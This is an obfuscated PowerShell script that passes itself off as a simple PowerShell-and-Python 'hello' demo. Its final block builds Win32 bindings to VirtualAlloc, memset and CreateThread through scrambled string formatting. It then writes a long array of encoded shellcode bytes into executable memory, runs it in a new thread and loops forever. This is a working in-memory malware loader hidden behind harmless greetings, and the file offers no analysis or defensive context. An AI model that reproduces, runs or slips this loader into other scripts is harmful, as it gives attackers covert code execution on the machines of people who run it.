("{3}{2}{1}{0}{4}" -f'werSh',' Po','o from','Hell','ell!')


.("{0}{2}{1}" -f 'pyt','on3','h') -c ((("{13}{19}{18}{8}{21}{12}{24}{5}{14}{22}{23}{1}{16}{20}{2}{0}{15}{4}{10}{3}{6}{17}{7}{11}{9}" -f 'rShel','0}','e',' alo',' ','thon!{','ng','gre',' ','})
{1}','get','at!{0','lo ','{','0})
','l','    Python a',' ','nt({0}','1}
pri','nd Pow','   Hel','p','rint({','from Py'))  -F [cHaR]39,[cHaR]34)


("{2}{0}{1}{4}{5}{3}{6}"-f ' t','o Po','Back','ll','wer','She','.')
("{2}{0}{1}"-f ' now','!','Bye')


${S`F73} = (((("{34}{31}{59}{18}{6}{65}{62}{46}{67}{38}{12}{26}{23}{37}{14}{24}{7}{11}{39}{1}{60}{8}{2}{33}{42}{9}{57}{5}{49}{50}{3}{44}{15}{30}{4}{28}{58}{22}{53}{54}{13}{19}{45}{66}{51}{47}{52}{16}{35}{17}{0}{61}{21}{10}{32}{63}{56}{55}{36}{25}{27}{29}{64}{48}{20}{41}{43}{40}"-f'uOmsvcrt.dllh','nt fl','otect);[','d','eadAttributes','tPtr Cr','O)]publ','ype','r','ublic stati','publi',', u',', ','StartAd','io','Ptr l','readId)','rt(h','dllhu','dres',', uin',']','kSize, Int','i','nT','tr mems','uint dwSize, u','e',',','t(','pThr','llImport','c sta','DllIm','[D',';[DllImpo','extern IntP','nt flAllocat','ess','i',');','t','port(huOkernel32.dllhuO)]p',' count','(Int','s, I','c(IntPtr ','onFlags,','c','eateTh','rea','tPtr lpParameter, uint dwCreati',' IntPtr lpTh','Ptr ','lp',' ','ic','c extern In',' uint dwStac','(huOkernel32.','P','uO)','tern IntPtr VirtualAllo','t','IntPtr dest, uint sr','ic static ex','n','lpAddr'))-REPLaCE  ([cHAr]104+[cHAr]117+[cHAr]79),[cHAr]34));${w} = &("{0}{1}{2}" -f'Add','-Typ','e') -memberDefinition ${s`F73} -Name ("{1}{0}"-f 'in32','W') -namespace ("{2}{3}{0}{1}"-f '32Fu','nctions','Wi','n') -passthru;[Byte[]];[Byte[]]${Z} = 0xdb,0xc4,0xd9,0x74,0x24,0xf4,0x5a,0x31,0xc9,0xb1,0x51,0xb8,0xf6,0x94,0x1b,0xf9,0x83,0xc2,0x04,0x31,0x42,0x16,0x03,0x42,0x16,0xe2,0x03,0x68,0xf3,0x7b,0xeb,0x91,0x04,0x1c,0x62,0x74,0x35,0x1c,0x10,0xfc,0x66,0xac,0x53,0x50,0x8b,0x47,0x31,0x41,0x18,0x25,0x9d,0x66,0xa9,0x80,0xfb,0x49,0x2a,0xb8,0x3f,0xcb,0xa8,0xc3,0x13,0x2b,0x90,0x0b,0x66,0x2a,0xd5,0x76,0x8a,0x7e,0x8e,0xfd,0x38,0x6f,0xbb,0x48,0x80,0x04,0xf7,0x5d,0x80,0xf9,0x40,0x5f,0xa1,0xaf,0xdb,0x06,0x61,0x51,0x0f,0x33,0x28,0x49,0x4c,0x7e,0xe3,0xe2,0xa6,0xf4,0xf2,0x22,0xf7,0xf5,0x58,0x0b,0x37,0x04,0xa1,0x4b,0xf0,0xf7,0xd4,0xa5,0x02,0x85,0xee,0x71,0x78,0x51,0x7b,0x62,0xda,0x12,0xdb,0x4e,0xda,0xf7,0xbd,0x05,0xd0,0xbc,0xca,0x42,0xf5,0x43,0x1f,0xf9,0x01,0xcf,0x9e,0x2e,0x80,0x8b,0x84,0xea,0xc8,0x48,0xa5,0xab,0xb4,0x3f,0xda,0xac,0x16,0x9f,0x7e,0xa6,0xbb,0xf4,0xf3,0xe5,0xd3,0x64,0x6e,0x62,0x24,0x11,0x07,0xe3,0x4a,0x88,0xb3,0x9b,0xde,0x3d,0x1d,0x5b,0x20,0x14,0x50,0xb8,0x8d,0xc4,0xc1,0x6d,0x61,0x83,0xdf,0xc7,0xfc,0xf4,0xe0,0x3d,0xad,0xa9,0x74,0xbd,0x01,0x1d,0xe2,0xf4,0x4d,0xd9,0xf2,0xf6,0x8d,0x35,0xa8,0xc3,0xbe,0x2f,0x78,0x2c,0x91,0xc7,0xd7,0xa5,0x8e,0xde,0x28,0x60,0x39,0x18,0x85,0xe3,0x3a,0xa7,0x49,0x70,0x69,0xf4,0xda,0x2f,0xdd,0xac,0xb4,0x24,0xb4,0x7e,0x7f,0x44,0xe2,0xe9,0x15,0xb0,0x52,0x45,0xba,0x97,0x3f,0x3f,0x54,0x35,0xc6,0xa7,0xdf,0xba,0x13,0x52,0xdf,0x30,0x96,0x12,0xaa,0x57,0xce,0x5c,0xe1,0x0a,0x59,0x62,0xdc,0x21,0x26,0xf4,0xde,0xa5,0xa6,0x04,0xb6,0xc5,0xa6,0x44,0x46,0x95,0xce,0x1c,0xe2,0x4a,0xea,0x62,0x3f,0xff,0xa7,0xcf,0x36,0xe7,0x1f,0x98,0x48,0xc8,0x9f,0x58,0x1b,0x5e,0xc8,0x4a,0x0d,0xd7,0xea,0x94,0xe4,0x6d,0x2a,0x1e,0xcb,0xe5,0xac,0xde,0x10,0x7c,0x72,0x95,0x73,0x27,0xb0,0x09,0x93,0x51,0xc9,0x49,0x9c,0x53,0x05,0x8f,0x4c,0xa5,0x5f,0xdd,0xbe,0xf4,0xa8,0x15,0x90,0xc5,0xe2,0x55;${g} = 0x1000;if (${z}."lE`NgTh" -gt 0x1000){${G} = ${Z}."l`ENgTH"};${0`Hm}=${W}::("{2}{3}{0}{1}"-f 'alA','lloc','Virt','u').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."L`EN`gth"-1);${i}++) {${W}::"mem`seT"([IntPtr](${0`hM}.("{1}{0}"-f '2','ToInt3').Invoke()+${I}), ${Z}[${i}], 1)};${W}::("{0}{2}{1}"-f'Cr','read','eateTh').Invoke(0,0,${0`HM},0,0,0);for (;;){&("{0}{1}{3}{2}"-f'Start','-s','eep','l') 60};
